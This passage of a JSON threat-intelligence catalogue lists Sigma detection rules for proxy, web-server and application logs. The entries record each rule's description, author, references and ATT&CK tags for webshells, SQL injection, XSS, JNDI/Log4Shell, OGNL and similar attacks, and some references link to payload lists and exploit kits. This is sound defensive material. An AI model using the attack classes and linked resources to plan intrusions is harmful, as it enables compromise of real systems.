"attack.t1036.005" ] }, "related": [ { "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", "value": "Flash Player Update from Suspicious Location" }, { "description": "Detects suspicious user agent strings user by hack tools in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_hacktool.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_hacktool.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "attack.credential-access", "attack.t1110" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", "value": "Hack Tool User Agent" }, { "description": "Detects a potentially suspicious empty user agent strings in proxy log.\nCould potentially indicate an uncommon request method.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_empty.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://twitter.com/Carlos_Perez/status/883455096645931008", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_empty.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", "value": "HTTP Request With Empty User Agent" }, { "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-04-15", "falsepositive": [ "Unknown" ], "filename": "proxy_pwndrop.yml", "level": "critical", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://breakdev.org/pwndrop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_pwndrop.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001", "attack.t1102.001", "attack.t1102.003" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9c99724c-a483-4d60-ad9d-7f004e42e8e8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", "value": "PwnDrp Access" }, { "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-05", "falsepositive": [ "User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)" ], "filename": "proxy_raw_paste_service_access.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.virustotal.com/gui/domain/paste.ee/relations", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_raw_paste_service_access.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001", "attack.t1102.001", "attack.t1102.003", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9c99724c-a483-4d60-ad9d-7f004e42e8e8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", "value": "Raw Paste Service Access" }, { "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-06-05", "falsepositive": [ "Legitimate use of Telegram bots in the company" ], "filename": "proxy_telegram_api.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_telegram_api.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1071.001", "attack.t1102.002" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b494b165-6634-483d-8c47-2026a6c52372", "value": "Telegram API Access" }, { "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-31", "falsepositive": [ "Serious issues with a configuration or plugin" ], "filename": "web_nginx_core_dump.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/nginx/web_nginx_core_dump.yml" ], "tags": [ "attack.impact", "attack.t1499.004" ] }, "related": [ { "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", "value": "Nginx Core Dump" }, { "description": "Detects an issue in apache logs that reports threading related errors", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-01-22", "falsepositive": [ "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" ], "filename": "web_apache_threading_error.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/apache/web_apache_threading_error.yml" ], "tags": [ "attack.initial-access", "attack.lateral-movement", "attack.t1190", "attack.t1210" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", "value": "Apache Threading Error" }, { "description": "Detects a segmentation fault error message caused by a crashing apache worker process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-02-28", "falsepositive": [ "Unknown" ], "filename": "web_apache_segfault.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ "http://www.securityfocus.com/infocus/1633", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/apache/web_apache_segfault.yml" ], "tags": [ "attack.impact", "attack.t1499.004" ] }, "related": [ { "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", "value": "Apache Segmentation Fault" }, { "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", "meta": { "author": "James Ahearn", "creation_date": "2019-06-08", "falsepositive": [ "Unknown" ], "filename": "web_source_code_enumeration.yml", "level": "medium", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_source_code_enumeration.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", "value": "Source Code Enumeration Detection by Keyword" }, { "description": "Detects possible Java payloads in web access logs", "meta": { "author": "frack113, Harjot Singh, \"@cyb3rjy0t\" (update)", "creation_date": "2022-06-04", "falsepositive": [ "Legitimate apps" ], "filename": "web_java_payload_in_access_logs.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035", "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", "https://twitter.com/httpvoid0x2f/status/1532924261035384832", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_java_payload_in_access_logs.yml" ], "tags": [ "cve.2022-26134", "cve.2021-26084", "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", "value": "Java Payload Strings" }, { "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", "meta": { "author": "Cian Heasley", "creation_date": "2020-08-04", "falsepositive": [ "Web applications that use the same URL parameters as ReGeorg" ], "filename": "web_webshell_regeorg.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/sensepost/reGeorg", "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_webshell_regeorg.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", "value": "Webshell ReGeorg Detection Via Web Logs" }, { "description": "Detects exploitation attempt using the JNDI-Exploit-Kit", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-12", "falsepositive": [ "Legitimate apps the use these paths" ], "filename": "web_jndi_exploit.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/pimps/JNDI-Exploit-Kit", "https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_jndi_exploit.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", "value": "JNDIExploit Pattern" }, { "description": "Detects XSS attempts injected via GET requests in access logs", "meta": { "author": "Saw Win Naung, Nasreddine Bencherchali", "creation_date": "2021-08-15", "falsepositive": [ "JavaScripts,CSS Files and PNG files", "User searches in search boxes of the respective website", "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" ], "filename": "web_xss_in_access_logs.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/payloadbox/xss-payload-list", "https://portswigger.net/web-security/cross-site-scripting/contexts", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_xss_in_access_logs.yml" ], "tags": [ "attack.initial-access", "attack.t1189" ] }, "related": [ { "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", "value": "Cross Site Scripting Strings" }, { "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "creation_date": "2022-07-19", "falsepositive": [ "Unknown" ], "filename": "web_susp_useragents.yml", "level": "medium", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_useragents.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", "value": "Suspicious User-Agents Related To Recon Tools" }, { "description": "Detects SSTI attempts sent via GET requests in access logs", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-14", "falsepositive": [ "User searches in search boxes of the respective website", "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" ], "filename": "web_ssti_in_access_logs.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/payloadbox/ssti-payloads", "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_ssti_in_access_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1221" ] }, "related": [ { "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", "value": "Server Side Template Injection Strings" }, { "description": "Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Thurein Oo", "creation_date": "2023-11-08", "falsepositive": [ "Legitimate usage of the BIG IP REST API to execute command for administration purposes" ], "filename": "web_f5_tm_utility_bash_api_request.yml", "level": "medium", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash", "https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029", "https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml" ], "tags": [ "attack.execution", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85254a62-22be-4239-b79c-2ec17e566c37", "value": "F5 BIG-IP iControl Rest API Command Execution - Webserver" }, { "description": "Detects common commands used in Windows webshells", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2017-02-19", "falsepositive": [ "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", "User searches in search boxes of the respective website" ], "filename": "web_win_webshells_in_access_logs.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://bad-jubies.github.io/RCE-NOW-WHAT/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", "value": "Windows Webshell Strings" }, { "description": "Detects potential SQL injection attempts via GET requests in access logs.", "meta": { "author": "Saw Win Naung, Nasreddine Bencherchali (Nextron Systems), Thurein Oo (Yoma Bank)", "creation_date": "2020-02-22", "falsepositive": [ "Java scripts and CSS Files", "User searches in search boxes of the respective website", "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" ], "filename": "web_sql_injection_in_access_logs.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection", "https://github.com/payloadbox/sql-injection-payload-list", "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", "https://brightsec.com/blog/sql-injection-payloads/", "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sql_injection_in_access_logs.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", "value": "SQL Injection Strings In URI" }, { "description": "Detects path traversal exploitation attempts", "meta": { "author": "Subhash Popuri (@pbssubhash), Florian Roth (Nextron Systems), Thurein Oo, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-09-25", "falsepositive": [ "Expected to be continuously seen on systems exposed to the Internet", "Internal vulnerability scanners" ], "filename": "web_path_traversal_exploitation_attempt.yml", "level": "medium", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://book.hacktricks.xyz/pentesting-web/file-inclusion", "https://github.com/projectdiscovery/nuclei-templates", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", "value": "Path Traversal Exploitation Attempts" }, { "description": "Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-06", "falsepositive": [ "Legitimate application and websites that use windows paths in their URL" ], "filename": "web_susp_windows_path_uri.yml", "level": "high", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_windows_path_uri.yml" ], "tags": [ "attack.persistence", "attack.exfiltration", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", "value": "Suspicious Windows Strings In URI" }, { "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", "meta": { "author": "frack113", "creation_date": "2021-10-06", "falsepositive": [ "Unknown" ], "filename": "web_iis_tilt_shortname_scan.yml", "level": "medium", "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ "https://github.com/lijiejie/IIS_shortname_Scanner", "https://www.exploit-db.com/exploits/19525", "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", "value": "Successful IIS Shortname Fuzzing Scan" }, { "description": "Generic rule for SQL exceptions in Python according to PEP 249", "meta": { "author": "Thomas Patzke", "creation_date": "2017-08-12", "falsepositive": [ "Application bugs" ], "filename": "app_python_sql_exceptions.yml", "level": "medium", "logsource.category": "application", "logsource.product": "python", "refs": [ "https://www.python.org/dev/peps/pep-0249/#exceptions", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", "value": "Python SQL Exceptions" }, { "description": "Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs" ], "filename": "java_jndi_injection_exploitation_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "jvm", "refs": [ "https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_jndi_injection_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb0e9cec-d4da-46f5-997f-22efc59f3dca", "value": "Potential JNDI Injection Exploitation In JVM Based Application" }, { "description": "Detects process execution related exceptions in JVM based apps, often relates to RCE", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs" ], "filename": "java_rce_exploitation_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "jvm", "refs": [ "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_rce_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d65f37da-a26a-48f8-8159-3dde96680ad2", "value": "Process Execution Error In JVM Based Application" }, { "description": "Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely.", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "If the application expects to work with XML there may be parsing issues that don't necessarily mean XXE." ], "filename": "java_xxe_exploitation_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "jvm", "refs": [ "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing", "https://rules.sonarsource.com/java/RSPEC-2755", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_xxe_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4e06896-e27c-4583-95ac-91ce2279345d", "value": "Potential XXE Exploitation Attempt In JVM Based Application" }, { "description": "Detects potential local file read vulnerability in JVM based apps.\nIf the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.\n", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs" ], "filename": "java_local_file_read.yml", "level": "high", "logsource.category": "application", "logsource.product": "jvm", "refs": [ "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_local_file_read.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e032f5bc-4563-4096-ae3b-064bab588685", "value": "Potential Local File Read Vulnerability In JVM Based Application" }, { "description": "Detects potential OGNL Injection exploitation, which may lead to RCE.\nOGNL is an expression language that is supported in many JVM based systems.\nOGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)\n", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs" ], "filename": "java_ognl_injection_exploitation_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "jvm", "refs": [ "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_ognl_injection_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "cve.2017-5638", "cve.2022-26134" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d0af518-828e-4a04-a751-a7d03f3046ad", "value": "Potential OGNL Injection Exploitation In JVM Based Application" }, { "description": "Detects potential SpEL Injection exploitation, which may lead to RCE.", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs" ], "filename": "spring_spel_injection.yml", "level": "high", "logsource.category": "application", "logsource.product": "spring", "refs": [ "https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/spring_spel_injection.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9edd087-89d8-48c9-b0b4-5b9bb10896b8", "value": "Potential SpEL Injection In Spring Framework" }, { "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", "meta": { "author": "Thomas Patzke", "creation_date": "2017-08-06", "falsepositive": [ "Application bugs" ], "filename": "spring_application_exceptions.yml", "level": "medium", "logsource.category": "application", "logsource.product": "spring", "refs": [ "https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/spring_application_exceptions.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", "value": "Spring Framework Exceptions" }, { "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", "meta": { "author": "Thomas Patzke", "creation_date": "2017-08-06", "falsepositive": [ "Application bugs" ], "filename": "appframework_ruby_on_rails_exceptions.yml", "level": "medium", "logsource.category": "application", "logsource.product": "ruby_on_rails", "refs": [ "http://edgeguides.rubyonrails.org/security.html", "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", "http://guides.rubyonrails.org/action_controller_overview.html", "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ 